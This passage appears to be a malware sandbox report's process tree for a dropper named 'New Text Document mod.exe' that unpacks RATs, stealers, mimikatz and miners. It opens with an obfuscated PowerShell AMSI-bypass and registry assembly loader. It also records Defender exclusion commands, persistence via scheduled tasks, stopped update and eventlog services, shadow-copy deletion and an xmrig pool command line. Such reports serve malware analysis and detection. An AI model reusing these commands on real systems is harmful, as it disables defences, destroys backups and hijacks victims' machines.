Char](83)+''+[Char](112)+''+[Char](101)+''+[Char](99)+''+'i'+''+[Char](97)+''+[Char](108)+''+[Char](78)+''+[Char](97)+''+'m'+''+[Char](101)+''+[Char](44)+'H'+[Char](105)+'de'+[Char](66)+''+[Char](121)+''+[Char](83)+'ig'+','+''+[Char](80)+''+[Char](117)+'b'+[Char](108)+''+[Char](105)+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$hviZgIVRhSjoif).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+'n'+'t'+[Char](105)+''+[Char](109)+''+[Char](101)+''+[Char](44)+'M'+[Char](97)+'n'+'a'+''+[Char](103)+''+'e'+''+[Char](100)+'');$WspJADuXWwb.DefineMethod(''+'I'+'n'+[Char](118)+'o'+[Char](107)+'e',''+[Char](80)+''+[Char](117)+''+[Char](98)+''+[Char](108)+'i'+[Char](99)+','+[Char](72)+''+'i'+'d'+[Char](101)+''+[Char](66)+''+[Char](121)+'S'+'i'+''+'g'+''+[Char](44)+''+[Char](78)+'e'+[Char](119)+'S'+[Char](108)+''+[Char](111)+'t'+','+''+[Char](86)+''+[Char](105)+''+'r'+''+'t'+''+'u'+''+[Char](97)+''+'l'+'',$lwpZDHGGmS,$hviZgIVRhSjoif).SetImplementationFlags(''+[Char](82)+'unt'+[Char](105)+'m'+[Char](101)+''+','+''+'M'+'a'+[Char](110)+''+[Char](97)+''+'g'+''+[Char](101)+''+[Char](100)+'');Write-Output $WspJADuXWwb.CreateType();}$SPfFOuEnuTFjf=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+'S'+'y'+[Char](115)+'t'+'e'+''+'m'+''+[Char](46)+''+[Char](100)+''+[Char](108)+''+'l'+'')}).GetType(''+'M'+''+[Char](105)+''+'c'+'ro'+[Char](115)+''+'o'+''+[Char](102)+'t.'+[Char](87)+'i'+[Char](110)+'32'+[Char](46)+''+[Char](85)+''+[Char](110)+''+'s'+''+[Char](97)+''+[Char](102)+'e'+[Char](78)+''+[Char](97)+''+[Char](116)+''+'i'+''+'v'+''+[Char](101)+''+[Char](77)+'e'+[Char](116)+''+'h'+''+[Char](111)+''+'d'+''+[Char](115)+'');$mBwWlXUNsHkJCt=$SPfFOuEnuTFjf.GetMethod(''+[Char](71)+''+'e'+''+'t'+''+[Char](80)+''+[Char](114)+'o'+[Char](99)+'A'+'d'+'dr'+'e'+''+'s'+'s',[Reflection.BindingFlags]('P'+[Char](117)+''+'b'+'li'+[Char](99)+''+[Char](44)+''+'S'+'ta'+'t'+''+'i'+''+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$IkbRIFsxqfiAjnJZPMH=pwmKIUDswknw @([String])([IntPtr]);$xEKvhpfORPLXIszYoPzbXh=pwmKIUDswknw @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$WNaDgaTornP=$SPfFOuEnuTFjf.GetMethod('G'+[Char](101)+'t'+[Char](77)+'o'+[Char](100)+''+'u'+''+[Char](108)+''+[Char](101)+''+'H'+''+[Char](97)+''+'n'+'dle').Invoke($Null,@([Object](''+[Char](107)+''+'e'+''+[Char](114)+''+'n'+''+'e'+'l3'+'2'+''+[Char](46)+''+[Char](100)+''+[Char](108)+''+[Char](108)+'')));$yPDHeVJxGBprUZ=$mBwWlXUNsHkJCt.Invoke($Null,@([Object]$WNaDgaTornP,[Object](''+'L'+''+'o'+'ad'+'L'+''+[Char](105)+''+'b'+'r'+[Char](97)+''+'r'+''+[Char](121)+''+'A'+'')));$GwqRWphaPVqGPWtgJ=$mBwWlXUNsHkJCt.Invoke($Null,@([Object]$WNaDgaTornP,[Object]('V'+[Char](105)+''+[Char](114)+''+[Char](116)+''+[Char](117)+'a'+'l'+'P'+[Char](114)+''+[Char](111)+''+'t'+''+'e'+'c'+[Char](116)+'')));$CTkpRfE=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($yPDHeVJxGBprUZ,$IkbRIFsxqfiAjnJZPMH).Invoke('a'+[Char](109)+''+[Char](115)+''+[Char](105)+''+'.'+''+[Char](100)+''+'l'+''+'l'+'');$UbrQvzWozgOQSGaLI=$mBwWlXUNsHkJCt.Invoke($Null,@([Object]$CTkpRfE,[Object](''+'A'+''+'m'+''+[Char](115)+''+[Char](105)+''+'S'+''+[Char](99)+''+[Char](97)+''+'n'+'B'+'u'+''+[Char](102)+'f'+'e'+''+'r'+'')));$mtgrZTeEht=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($GwqRWphaPVqGPWtgJ,$xEKvhpfORPLXIszYoPzbXh).Invoke($UbrQvzWozgOQSGaLI,[uint32]8,4,[ref]$mtgrZTeEht);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$UbrQvzWozgOQSGaLI,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($GwqRWphaPVqGPWtgJ,$xEKvhpfORPLXIszYoPzbXh).Invoke($UbrQvzWozgOQSGaLI,[uint32]8,0x20,[ref]$mtgrZTeEht);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('S'+'O'+''+[Char](70)+''+'T'+''+[Char](87)+'A'+[Char](82)+'E').GetValue(''+[Char](36)+''+[Char](76)+'M'+[Char](88)+''+'s'+'t'+[Char](97)+'g'+[Char](101)+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"2⤵
- Command and Scripting Interpreter: PowerShell
PID:6952
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s nsi1⤵PID:1164
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc1⤵PID:1244
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc1⤵PID:1260
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netprofm -p -s netprofm1⤵PID:1316
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc1⤵PID:1356
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager1⤵PID:1388
-
C:\Windows\system32\sihost.exesihost.exe2⤵PID:2924
-
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog1⤵PID:1536
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s Themes1⤵PID:1628
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem1⤵PID:1636
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p1⤵PID:1676
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s SENS1⤵PID:1732
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder1⤵PID:1772
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp1⤵PID:1832
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:1860
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:1924
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:1932
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection1⤵PID:1068
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵PID:2060
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository1⤵PID:2100
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation1⤵PID:2220
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc1⤵PID:2376
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent1⤵PID:2564
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT1⤵PID:2572
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p1⤵PID:2616
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer1⤵PID:2696
-
C:\Windows\sysmon.exeC:\Windows\sysmon.exe1⤵PID:2732
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks1⤵PID:2744
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService1⤵PID:2752
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt1⤵PID:2760
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc1⤵PID:3020
-
C:\Windows\system32\wbem\unsecapp.exeC:\Windows\system32\wbem\unsecapp.exe -Embedding1⤵PID:2900
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
PID:3368 -
C:\Program Files\7-Zip\7zFM.exe"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe.zip"2⤵
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:1132
-
-
C:\Users\Admin\Desktop\New Text Document mod.exe"C:\Users\Admin\Desktop\New Text Document mod.exe"2⤵
- Quasar RAT
- Executes dropped EXE
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1988 -
C:\Users\Admin\Desktop\._cache_New Text Document mod.exe"C:\Users\Admin\Desktop\._cache_New Text Document mod.exe"3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4628 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵PID:3112
-
-
C:\Users\Admin\Desktop\a\voidware_loader.exe"C:\Users\Admin\Desktop\a\voidware_loader.exe"4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3352 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "DirectX" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\DirectX111.exe" /rl HIGHEST /f5⤵
- Scheduled Task/Job: Scheduled Task
PID:4012
-
-
C:\Users\Admin\AppData\Roaming\SubDir\DirectX111.exe"C:\Users\Admin\AppData\Roaming\SubDir\DirectX111.exe"5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1096 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "DirectX" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\DirectX111.exe" /rl HIGHEST /f6⤵
- Scheduled Task/Job: Scheduled Task
PID:412
-
-
-
-
C:\Users\Admin\Desktop\a\build.exe"C:\Users\Admin\Desktop\a\build.exe"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3340
-
-
C:\Users\Admin\Desktop\a\gem1.exe"C:\Users\Admin\Desktop\a\gem1.exe"4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4656 -
C:\Users\Admin\Desktop\a\gem1.exe"C:\Users\Admin\Desktop\a\gem1.exe"5⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:3424
-
-
C:\Users\Admin\Desktop\a\gem1.exe"C:\Users\Admin\Desktop\a\gem1.exe"5⤵
- Executes dropped EXE
- Accesses Microsoft Outlook profiles
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- outlook_office_path
- outlook_win_path
PID:2528
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4656 -s 1525⤵
- Program crash
PID:4212
-
-
-
C:\Users\Admin\Desktop\a\JJSPLOIT.V2.exe"C:\Users\Admin\Desktop\a\JJSPLOIT.V2.exe"4⤵PID:1456
-
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "windows background updater" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\windows updater\windows 3543.exe" /rl HIGHEST /f5⤵
- Scheduled Task/Job: Scheduled Task
PID:7380
-
-
-
C:\Users\Admin\Desktop\a\albt.exe"C:\Users\Admin\Desktop\a\albt.exe"4⤵PID:5016
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Public\NsltarpnF.cmd" "5⤵PID:3992
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd5⤵PID:2720
-
-
C:\Users\Public\Libraries\npratlsN.pifC:\Users\Public\Libraries\npratlsN.pif5⤵PID:7432
-
-
-
C:\Users\Admin\Desktop\a\drop2.exe"C:\Users\Admin\Desktop\a\drop2.exe"4⤵PID:7912
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -Command "Add-MpPreference -ExclusionExtension '.exe'; Add-MpPreference -ExclusionProcess 'svchost.exe'"5⤵
- Command and Scripting Interpreter: PowerShell
PID:7180
-
-
C:\Windows\SYSTEM32\SCHTASKS.exeSCHTASKS /CREATE /TN "System-f4855f59e0" /TR "C:\Windows\System32\System-f4855f59e0.exe" /SC ONLOGON /RL HIGHEST /F5⤵
- Scheduled Task/Job: Scheduled Task
PID:8444
-
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe5⤵PID:5696
-
C:\Windows\System32\powercfg.exepowercfg -change standby-timeout-ac 06⤵
- Power Settings
PID:2436
-
-
C:\Windows\System32\powercfg.exepowercfg -change monitor-timeout-ac 06⤵
- Power Settings
PID:8000
-
-
C:\Windows\System32\powercfg.exepowercfg /setacvalueindex SCHEME_CURRENT SUB_BUTTONS LIDACTION 06⤵
- Power Settings
PID:7656
-
-
C:\Windows\System32\powercfg.exepowercfg /setactive SCHEME_CURRENT6⤵
- Power Settings
PID:7668
-
-
C:\Windows\System32\Wbem\wmic.exewmic diskdrive get serialnumber6⤵PID:7392
-
-
C:\Windows\System32\Wbem\wmic.exewmic diskdrive get serialnumber6⤵PID:1532
-
-
C:\Windows\System32\curl.execurl -s https://api.ipify.org6⤵PID:4040
-
-
C:\Windows\System32\Wbem\wmic.exewmic diskdrive get serialnumber6⤵PID:7412
-
-
C:\Windows\System32\curl.execurl -s http://ipinfo.io/country6⤵PID:3316
-
-
C:\Windows\System32\svchost.exe"C:\Windows\System32\svchost.exe" --algo rx/0 --url pool.supportxmr.com:8080 --user 46M39DM1DQjFKUnT3t2KiHNU6qQjmRF79J31fSbtBNafUX9B2gAwysjLFADQ5mhqR4M6C8JJRFXwLPxDHapuCrHE3mRBjTw/lunarig --cpu-max-threads-hint=306⤵PID:8088
-
-
-
C:\Windows\SysWOW64\explorer.exe"C:\Windows\SysWOW64\explorer.exe"5⤵PID:7864
-
-
C:\Windows\SysWOW64\explorer.exe"C:\Windows\SysWOW64\explorer.exe"5⤵PID:1996
-
-
-
C:\Users\Admin\Desktop\a\drop1.exe"C:\Users\Admin\Desktop\a\drop1.exe"4⤵PID:3532
-
C:\Users\Admin\Desktop\a\drop1.exe"C:\Users\Admin\Desktop\a\drop1.exe"5⤵PID:5876
-
-
-
C:\Users\Admin\Desktop\a\01.exe"C:\Users\Admin\Desktop\a\01.exe"4⤵PID:7284
-
C:\Users\Admin\Desktop\a\._cache_01.exe"C:\Users\Admin\Desktop\a\._cache_01.exe"5⤵PID:7816
-
C:\Users\Admin\Desktop\a\a\gem2.exe"C:\Users\Admin\Desktop\a\a\gem2.exe"6⤵PID:3744
-
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force7⤵
- Command and Scripting Interpreter: PowerShell
PID:712
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart7⤵PID:9124
-
C:\Windows\system32\wusa.exewusa /uninstall /kb:890830 /quiet /norestart8⤵PID:3932
-
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop UsoSvc7⤵
- Launches sc.exe
PID:9156
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop WaaSMedicSvc7⤵
- Launches sc.exe
PID:6080
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop wuauserv7⤵
- Launches sc.exe
PID:8440
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop bits7⤵
- Launches sc.exe
PID:7008
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop dosvc7⤵
- Launches sc.exe
PID:5764
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 07⤵
- Power Settings
PID:2320
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 07⤵
- Power Settings
PID:7080
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-ac 07⤵
- Power Settings
PID:5440
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-dc 07⤵
- Power Settings
PID:6604
-
-
C:\Windows\system32\dialer.exeC:\Windows\system32\dialer.exe7⤵PID:4652
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop eventlog7⤵
- Launches sc.exe
PID:8164
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe start "GeekBrains"7⤵
- Launches sc.exe
PID:712
-
-
-
-
-
C:\Users\Admin\Desktop\a\wudi.exe"C:\Users\Admin\Desktop\a\wudi.exe"4⤵PID:7304
-
-
C:\Users\Admin\Desktop\a\sdggwsdgdrwgrwgrwgrwgrw.exe"C:\Users\Admin\Desktop\a\sdggwsdgdrwgrwgrwgrwgrw.exe"4⤵PID:2180
-
-
C:\Users\Admin\Desktop\a\Kerish_Doctor_2023.exe"C:\Users\Admin\Desktop\a\Kerish_Doctor_2023.exe"4⤵PID:5884
-
C:\Users\Admin\AppData\Local\Temp\is-OU8OS.tmp\Kerish_Doctor_2023.tmp"C:\Users\Admin\AppData\Local\Temp\is-OU8OS.tmp\Kerish_Doctor_2023.tmp" /SL5="$8033E,33350357,805376,C:\Users\Admin\Desktop\a\Kerish_Doctor_2023.exe"5⤵PID:6016
-
-
-
-
C:\ProgramData\Synaptics\Synaptics.exe"C:\ProgramData\Synaptics\Synaptics.exe" InjUpdate3⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:2888 -
C:\Users\Admin\Desktop\._cache_Synaptics.exe"C:\Users\Admin\Desktop\._cache_Synaptics.exe" InjUpdate4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4104 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵PID:652
-
-
-
-
-
C:\Users\Admin\Desktop\New Text Document mod.exe"C:\Users\Admin\Desktop\New Text Document mod.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1824 -
C:\Users\Admin\Desktop\._cache_New Text Document mod.exe"C:\Users\Admin\Desktop\._cache_New Text Document mod.exe"3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3956 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵PID:3988
-
-
C:\Users\Admin\Desktop\a\gem2.exe"C:\Users\Admin\Desktop\a\gem2.exe"4⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
PID:5128 -
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5268
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart5⤵PID:2076
-
C:\Windows\system32\wusa.exewusa /uninstall /kb:890830 /quiet /norestart6⤵PID:5456
-
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop UsoSvc5⤵
- Launches sc.exe
PID:3748
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop WaaSMedicSvc5⤵
- Launches sc.exe
PID:5472
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop wuauserv5⤵
- Launches sc.exe
PID:5524
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop bits5⤵
- Launches sc.exe
PID:5564
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop dosvc5⤵
- Launches sc.exe
PID:5612
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 05⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:5616
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 05⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:5624
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-ac 05⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:5664
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-dc 05⤵
- Power Settings
PID:2552
-
-
C:\Windows\system32\dialer.exeC:\Windows\system32\dialer.exe5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5660
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe delete "GeekBrains"5⤵
- Launches sc.exe
PID:5736
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe create "GeekBrains" binpath= "C:\ProgramData\Screenshots\Lightshot.exe" start= "auto"5⤵
- Launches sc.exe
PID:5296
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop eventlog5⤵
- Launches sc.exe
PID:1484
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe start "GeekBrains"5⤵
- Launches sc.exe
PID:5340 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵PID:4368
-
-
-
-
C:\Users\Admin\Desktop\a\Steanings.exe"C:\Users\Admin\Desktop\a\Steanings.exe"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:6552
-
-
C:\Users\Admin\Desktop\a\uu.exe"C:\Users\Admin\Desktop\a\uu.exe"4⤵PID:5828
-
-
C:\Users\Admin\Desktop\a\32.exe"C:\Users\Admin\Desktop\a\32.exe"4⤵PID:2320
-
C:\Users\Admin\Desktop\a\._cache_32.exe"C:\Users\Admin\Desktop\a\._cache_32.exe"5⤵PID:3084
-
-
-
-
-
C:\Users\Admin\Desktop\New Text Document mod.exe"C:\Users\Admin\Desktop\New Text Document mod.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4676 -
C:\Users\Admin\Desktop\._cache_New Text Document mod.exe"C:\Users\Admin\Desktop\._cache_New Text Document mod.exe"3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:764 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵PID:3432
-
-
C:\Users\Admin\Desktop\a\voidware_loader.exe"C:\Users\Admin\Desktop\a\voidware_loader.exe"4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2860
-
-
C:\Users\Admin\Desktop\a\cbot.exe"C:\Users\Admin\Desktop\a\cbot.exe"4⤵
- Drops startup file
- Executes dropped EXE
PID:5160
-
-
C:\Users\Admin\Desktop\a\Client.exe"C:\Users\Admin\Desktop\a\Client.exe"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:6872
-
-
C:\Users\Admin\Desktop\a\svhost.exe"C:\Users\Admin\Desktop\a\svhost.exe"4⤵
- Executes dropped EXE
PID:5128 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵PID:6920
-
-
-
C:\Users\Admin\Desktop\a\mimikatz.exe"C:\Users\Admin\Desktop\a\mimikatz.exe"4⤵
- Executes dropped EXE
PID:5296 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵PID:1712
-
-
-
C:\Users\Admin\Desktop\a\123.exe"C:\Users\Admin\Desktop\a\123.exe"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:6296
-
-
C:\Users\Admin\Desktop\a\xmrig.exe"C:\Users\Admin\Desktop\a\xmrig.exe"4⤵
- Executes dropped EXE
PID:6800 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵PID:6628
-
-
-
C:\Users\Admin\Desktop\a\chrtrome22.exe"C:\Users\Admin\Desktop\a\chrtrome22.exe"4⤵
- Executes dropped EXE
PID:5636 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵PID:1492
-
-
C:\xmrig\xmrig-6.22.2\xmrig.exe"C:\xmrig\xmrig-6.22.2\xmrig.exe" --config=C:\xmrig\xmrig-6.22.2\config.json5⤵PID:2176
-
-
-
C:\Users\Admin\Desktop\a\Fixer.exe"C:\Users\Admin\Desktop\a\Fixer.exe"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:6600
-
-
C:\Users\Admin\Desktop\a\Client-built.exe"C:\Users\Admin\Desktop\a\Client-built.exe"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:5660
-
-
C:\Users\Admin\Desktop\a\AsyncClientGK.exe"C:\Users\Admin\Desktop\a\AsyncClientGK.exe"4⤵PID:1784
-
-
C:\Users\Admin\Desktop\a\RuntimeBroker.exe"C:\Users\Admin\Desktop\a\RuntimeBroker.exe"4⤵PID:6164
-
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "RuntimeBroker" /sc ONLOGON /tr "C:\Windows\system32\a7\RuntimeBroker.exe" /rl HIGHEST /f5⤵
- Scheduled Task/Job: Scheduled Task
PID:5140
-
-
C:\Windows\system32\a7\RuntimeBroker.exe"C:\Windows\system32\a7\RuntimeBroker.exe"5⤵PID:3360
-
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "RuntimeBroker" /sc ONLOGON /tr "C:\Windows\system32\a7\RuntimeBroker.exe" /rl HIGHEST /f6⤵
- Scheduled Task/Job: Scheduled Task
PID:2200
-
-
-
-
C:\Users\Admin\Desktop\a\Crawl.exe"C:\Users\Admin\Desktop\a\Crawl.exe"4⤵PID:7088
-
\??\c:\Windows\system32\wbem\wmic.exec:\nwVGkh\nwVG\..\..\Windows\nwVG\nwVG\..\..\system32\nwVG\nwVG\..\..\wbem\nwVG\nwVGk\..\..\wmic.exe shadowcopy delete5⤵PID:2488
-
-
\??\c:\Windows\system32\wbem\wmic.exec:\YksnBZ\Yksn\..\..\Windows\Yksn\Yksn\..\..\system32\Yksn\Yksn\..\..\wbem\Yksn\YksnB\..\..\wmic.exe shadowcopy delete5⤵PID:7228
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\Desktop\a\Crawl.exe"5⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:5344 -
C:\Windows\SysWOW64\PING.EXEping 1.1.1.1 -n 1 -w 30006⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:8160
-
-
-
-
C:\Users\Admin\Desktop\a\sela.exe"C:\Users\Admin\Desktop\a\sela.exe"4⤵PID:644
-
C:\Users\Admin\Desktop\a\._cache_sela.exe"C:\Users\Admin\Desktop\a\._cache_sela.exe"5⤵PID:4916
-
C:\Users\Admin\Desktop\a\a\voidware_loader.exe"C:\Users\Admin\Desktop\a\a\voidware_loader.exe"6⤵PID:1140
-
-
C:\Users\Admin\Desktop\a\a\build.exe"C:\Users\Admin\Desktop\a\a\build.exe"6⤵PID:7856
-
-
